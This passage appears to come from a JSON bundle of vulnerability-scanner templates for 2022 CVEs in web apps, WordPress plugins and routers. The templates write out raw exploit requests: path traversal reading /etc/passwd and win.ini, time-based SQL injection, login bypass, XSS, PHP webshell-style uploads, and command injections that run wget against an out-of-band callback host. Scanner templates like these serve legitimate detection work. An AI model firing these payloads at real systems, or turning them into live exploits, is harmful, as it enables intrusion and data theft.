sid=foo\n\nsid=foo&hhook=exec&text={{cmd}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25486","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertConfigField.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurlConfig=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39960","info":{"name":"Jira Netic Group Export <1.0.3 - Missing Authorization","severity":"medium"},"requests":[{"raw":["POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroupexport_searchstring=&groupexport_download=true\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"jiraGroupObjects\"","\"groupName\""],"condition":"and"},{"type":"word","part":"header","words":["attachment","jira-group-export"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43170","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=info_block&is_active=1&sections_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2462","info":{"name":"WordPress Transposh <=1.0.8.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php"],"body":"action=tp_history&token=&lang=en","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(transposh) > 0"]},{"type":"word","part":"body","words":["translated","translated_by","timestamp","source","user_login"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0788","info":{"name":"WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": \"(SELECT 1 FROM (SELECT(SLEEP(6)))me)\", \"formid\": \"1\", \"type\": \"online_payment\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"Invalid payment.\")"],"condition":"and"}]}]},{"id":"CVE-2022-0885","info":{"name":"Member Hero <=1.0.9 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-28032","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Page Deleted\")"],"condition":"and"}]}]},{"id":"CVE-2022-0824","info":{"name":"Webmin <1.990 - Improper Access Control","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect=1;testing=1;PHPSESSID=;\n\nuser={{username}}&pass={{password}}\n","POST /extensions/file-manager/http_download.cgi?module=filemin HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/filemin/?xnavigation=1\n\nlink=http://{{interactsh-url}}&username=&password=&path=/{{ranstr}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Failed to write to /{{ranstr}}/index.html"]}]}]},{"id":"CVE-2022-41473","info":{"name":"RPCMS 3.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/?q=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","rpcms"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40083","info":{"name":"Labstack Echo 4.8.0 - Open Redirect","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}//interactsh.com%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"location","regex":["^\\s*//interactsh.com/\\.\\."]},{"type":"status","status":[301]}]}]},{"id":"CVE-2022-0826","info":{"name":"WordPress WP Video Gallery <=1.7.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wp_video_gallery_ajax_add_single_youtube&url=http://example.com/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Registred videos :\")"],"condition":"and"}]}]},{"id":"CVE-2022-37153","info":{"name":"Artica Proxy 4.30.000000 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /fw.login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password\" value=\"admin\"><script>alert(document.domain)</script>","Artica Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36537","info":{"name":"ZK Framework - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /login.zul HTTP/1.1\nHost: {{Hostname}}\n","POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Length: 154\n\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Disposition: form-data; name=\"nextURI\"\n\n/WEB-INF/web.xml\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<display-name>.*</display-name>","<welcome-file-list>((.|\n)*)welcome-file-list>","xml version","web-app"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"dtid","group":1,"regex":["dt:'(.*?)',cu:"],"internal":true}]}]},{"id":"CVE-2022-1398","info":{"name":"External Media without Import <=1.1.2 - Authenticated Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/upload.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurls=http%3A%2F%2F{{interactsh-url}}&width=&height=&mime-type=&action=add_external_media_without_import\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_2","words":["external-media-without-import"]}]}]},{"id":"CVE-2022-31981","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Control Teams\")"],"condition":"and"}]}]},{"id":"CVE-2022-4306","info":{"name":"WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"panda-repeater-add-new\")"],"condition":"and"}]}]},{"id":"CVE-2022-1713","info":{"name":"Drawio <18.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /proxy?url=http%3a//0:8080/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Flowchart Maker & Online Diagram Software</title>"]},{"type":"word","part":"header","words":["application/octet-stream"]}]}]},{"id":"CVE-2022-45917","info":{"name":"ILIAS eLearning <7.16 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/shib_logout.php?action=logout&return=https://example.com","{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://example.com"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)example\\.com\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-35416","info":{"name":"H3C SSL VPN <=2022-07-10 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wnm/login/login.json HTTP/1.1\nHost: {{Hostname}}\nCookie: svpnlang=<script>alert('document.domain')</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('document.domain')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1883","info":{"name":"Terraboard <2.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(10))+ISNULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["\"page\":","\"results\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40879","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>=PQ</p>","\u8be5\u6587\u4ef6\u4e0d"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38637","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/user-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>User  | Dashboard</title>","Book My Appointment"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21705","info":{"name":"October CMS -  Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\n","POST /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onSave\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onCreateTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&type=page\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onOpenTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["function onInit()","phpinfo()","Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`."],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"session_key","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[1]"],"attribute":"value"},{"type":"xpath","name":"token","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[2]"],"attribute":"value"},{"type":"regex","name":"theme","group":1,"regex":["<input\\stype=\\\\\"hidden\\\\\"\\svalue=\\\\\"demo\\\\\"\\sname=\\\\\"([^\"]*)\\\\\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-34576","info":{"name":"WAVLINK WN535 G3 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25216","info":{"name":"DVDFab 12 Player/PlayerFab - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/C%3a%2fwindows%2fsystem.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2488","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0784","info":{"name":"WordPress Title Experiments Free <9.0.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"images\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-28079","info":{"name":"College Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/asign-single-student-subjects.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubmit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-44946","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-24266","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\norder_by=id`,if(SUBSTRING('test',1,1)='t',sleep(6),sleep(0))--+-&path=component%2Ftable_manager%2Fview%2Fcu_users&uniqueClass=wrapper_content_919044\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"list_admin_table\")"],"condition":"and"}]}]},{"id":"CVE-2022-29303","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nPOST /conf_mail.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]}]}]},{"id":"CVE-2022-31846","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/live_mfg.shtml"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","DefaultIP=","LOGO1="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43140","info":{"name":"kkFileView 4.1.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"],"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2022-34049","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"medium"},"requests":[{"raw":["GET /cgi-bin/ExportLogs.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login","Password"],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32007","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_email={{username}}&user_pass={{password}}&btnLogin=\n","GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-0346","info":{"name":"WordPress XML Sitemap Generator for Google <2.0.4 - Cross-Site Scripting/Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp","{{BaseURL}}/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5(\"CVE-2022-0346\");%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp"],"stop-at-first-match":true,"req-condition":true,"matchers":[{"type":"word","part":"body_1","words":["<img src onerror=alert(document.domain)>","Invalid Provider type specified"],"condition":"and"},{"type":"word","part":"body_2","words":["2ef3baa95802a4b646f2fc29075efe34"]}]}]},{"id":"CVE-2022-25487","info":{"name":"Atom CMS v2.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /admin/uploads.php?id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"\n\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: image/jpeg\n\n\n<?php echo md5('CVE-2022-25487');?>\n-----------------------------30623082103363803402542706041--\n","GET /uploads/{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["7ee3686858eb89dd68ccf85f0ea03abe"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["SET avatar = '(.*?)'"],"internal":true}]}]},{"id":"CVE-2022-1391","info":{"name":"WordPress Cab fare calculator < 1.0.4 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38296","info":{"name":"Cuppa CMS v1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /js/jquery_file_upload/server/php/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary9MZjlIG8fVPjrlCI\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"path\"\n\n/\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"unique_name\"\n\ntrue\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_width\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_height\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"crop\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"compress\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"files[]\"; filename=\"test-{{randstr}}.jpg\"\nContent-Type: image/jpeg\n\n<?php\n\necho md5(\"CVE-2022-38296\");\n\n?>\n------WebKitFormBoundary9MZjlIG8fVPjrlCI--\n","POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//{{filename}}\",\"to\":\"//{{randstr}}.php\",\"action\":\"rename\"}\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["ed6bf8b1b4b8e64836455fe32b958c2c"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["\"name\":\"(.*?)\","],"internal":true}]}]},{"id":"CVE-2022-1906","info":{"name":"WordPress Copyright Proof <=4.16 - Cross-Site-Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["got message <script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26233","info":{"name":"Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2022-44952","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NAME]\"\n\nTest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SHORT_NAME]\"\n\ntest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_LOGO\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO_URL]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_FAVICON\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FAVICON]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_COPYRIGHT_NAME]\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LANGUAGE]\"\n\nenglish.php\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SKIN]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_TIMEZONE]\"\n\nAmerica/New_York\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_ROWS_PER_PAGE]\"\n\n10\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATE_FORMAT]\"\n\nm/d/Y\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATETIME_FORMAT]\"\n\nm/d/Y H:i\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NUMBER_FORMAT]\"\n\n2/./*\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FIRST_DAY_OF_WEEK]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; 